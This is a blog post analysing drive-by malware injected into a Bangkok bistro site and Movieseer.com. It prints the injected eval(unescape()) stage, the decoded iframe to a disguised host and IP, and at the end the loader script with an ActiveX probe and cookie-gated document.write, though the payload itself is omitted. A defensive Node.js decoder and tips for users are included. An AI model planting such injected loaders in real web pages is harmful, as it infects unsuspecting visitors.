Last night I went to a tweetup at a bistro in Sukhumvit, Bangkok.
Before heading off there, I checked online for the location and was dismayed to find the website infected with malware. Dismayed, because prior to going to see the so-so movie Inception the night before, I’d visited the website Movieseer.com to check times – only to find it likewise infected with malware.
I tweeted out what I saw on Movieseer.com, which was sending the user an executable file for Windows (‘inst.exe’) after linking to a server in Bosnia. I’m pleased to report Movieseer.com was fixed the next day. Fixed to the extent that the symptom was gone, but I’m not so optimistic as to think the cause is fixed, and my best guess is that the cause was SQL injection, which would have been aided in no small part by the fact that movieseer has a history of (MS)SQL issues which they echo to the screen (that’s an ‘in-production no-no’). Cheers for that say our Bosnian friends.
Google is cautioning that this bistro site contains malware, and following the Google link for details reveals this was recorded on or before 1st July – more than two weeks ago! Flabbergasted?
What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-07-01, and the last time suspicious content was found on this site was on 2010-07-01.
Malicious software includes 2 scripting exploit(s), 2 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.
The site is a PHP site and the exploit uses javascript in the HTML. It could again be SQL injection if the site uses a database; it could be an exploit of an aged or insecure PHP install; or it could be, and perhaps most likely is, just a weak password on an FTP server allowing the javascript to be appended to the index file. As an ISP in Australia, I see these all too regularly, and what is noteworthy is both the guessability of the passwords and the potential to also exploit POP3 mail, webmail and user accounts (i.e. the ISP management account). Somewhere in there may be gold in the form of credit card details or more passwords. Also, friends and acquaintances for the purposes of social engineering.
It’s no secret that exploits these days are after material gain, nor that they are increasingly multi-vector, i.e. pursuing more than one point of attack and/or an attack that opens up the potential for another, more significant one.
But back to this exploit:
There is some javascript appended to the end of the page. The content is a sequence of escape codes fed into the javascript as:
eval(unescape('escaped codes'))
Unescaping the escaped codes reveals what the server is sending to the user’s browser:
<iframe src="http://dXnwXo.com/?282406">
This looks like a cross-site scripting attack (XSS), on account of the 3rd party site embedded via an iframe, which then goes on to attempt instantiation of an ActiveXObject and to set a cookie in the user’s browser.
NB the URL above is mangled with Xs so I don’t get mistaken for something infected. The 3rd party site is hosted in Vietnam (222.255.28.156 – VietNam Data Communication Company). Nameservers for the domain are located in Vietnam and the Czech Republic. The domain registrant uses a .ru address, but that’s not reliable the way the IP addresses are.
It’d be interesting to pursue this further; however, time’s up for me. Comments welcome.
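The two obfuscation stages described here (the eval(unescape(...)) wrapper, and the hex blob rebuilt into %XX escapes two characters at a time, as in the script pasted at the end of this post) can be unwound offline so that the injected iframe targets are visible without loading the page. The following Node.js scanner is an added example, not code from the original post; the function names and the sample page are constructed, and the host in the sample is a placeholder, not a real indicator.

```javascript
// Added example, not code from the original post: a small Node.js scanner for
// the two obfuscation stages described above. Names and the sample page are
// constructed; the host in the sample is a placeholder, not a real indicator.
// Equivalent of the legacy JavaScript unescape(): decode %XX and %uXXXX.
function unescapeJs(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Second stage seen in the pasted script: the hex blob is turned back into
// %XX escapes two characters at a time, then unescaped.
function decodeHexPairs(hex) {
  let pct = '';
  for (let i = 0; i + 1 < hex.length; i += 2) pct += '%' + hex.slice(i, i + 2);
  return unescapeJs(pct);
}

// First stage: pull the literal out of every eval(unescape('...')) occurrence.
function findEvalUnescape(html) {
  const re = /eval\s*\(\s*unescape\s*\(\s*(['"])([^'"]*)\1\s*\)\s*\)/g;
  const hits = []; let m;
  while ((m = re.exec(html)) !== null) hits.push(m[2]);
  return hits;
}

// Report every <iframe src=...> target found in decoded markup.
function extractIframeSrcs(markup) {
  const re = /<iframe[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/gi;
  const out = []; let m;
  while ((m = re.exec(markup)) !== null) out.push(m[1]);
  return out;
}

// Decode each eval(unescape()) stage and list the iframes it would inject.
function scanPage(html) {
  return findEvalUnescape(html).map((blob) => {
    const decoded = unescapeJs(blob);
    return { decoded, iframes: extractIframeSrcs(decoded) };
  });
}

// Constructed sample: a clean page with the injected stage appended at the end.
const SAMPLE_HTML = '<html><body>Bistro menu</body></html>\n<script>' +
  "eval(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2F%3F282406" +
  "%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'))</script>";

const REPORT = scanPage(SAMPLE_HTML);
console.log(JSON.stringify(REPORT, null, 2));
```

Run it against a saved copy of a suspect page (read the file into scanPage instead of SAMPLE_HTML); a non-empty iframes list pointing at a host the site has no business loading is the signal to look for.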
How to avoid being a victim of this attack?
- Don’t have ActiveX enabled or don’t use Windows
- Disallow 3rd party cookies
- Use Google, OpenDNS or an A/V application to check pages you’re loading prior to load.
Web pages are the primary vector of malware attack having replaced email some time ago.
And… surf safely. It’s tragic that otherwise good sites like these are appropriated as black-hat due to some pretty serious ignorance. That’s why you have to take extra steps to protect yourself. An infection spread as innocuously as this could ruin your life and increasingly so.
Or was this all just a dream (within a dream (within a dream))?
var mytest = "0";
try { new ActiveXObject('dX'); }                  // probe: does ActiveX work in this browser?
catch (e) { mytest = "1"; }
if (mytest == "1")
{
  var X6XJ = /* hex payload string of at least 19350 characters, not reproduced here */ '';
  var NXzXu = '';
  var dXnXRX = X6XJ.slice(14, 19350);             // unused in the pasted script
  for (var gt = 14; gt < 19350; gt += 2) {
    NXzXu += '%' + X6XJ.slice(gt, gt + 2);        // rebuild %XX escapes two hex chars at a time
  }
  var bX4X = document.cookie;
  var start = bX4X.indexOf("lXmbX=");
  if (start == -1) {                              // only fire once per browser while the cookie lives
    var expires = new Date();
    expires.setTime(expires.getTime() + 3*3600*1000);   // 3 hours
    document.cookie = "lXmbX=update;expires=" + expires.toGMTString();
    document.write(unescape(NXzXu));              // second stage is written into the page
  }
}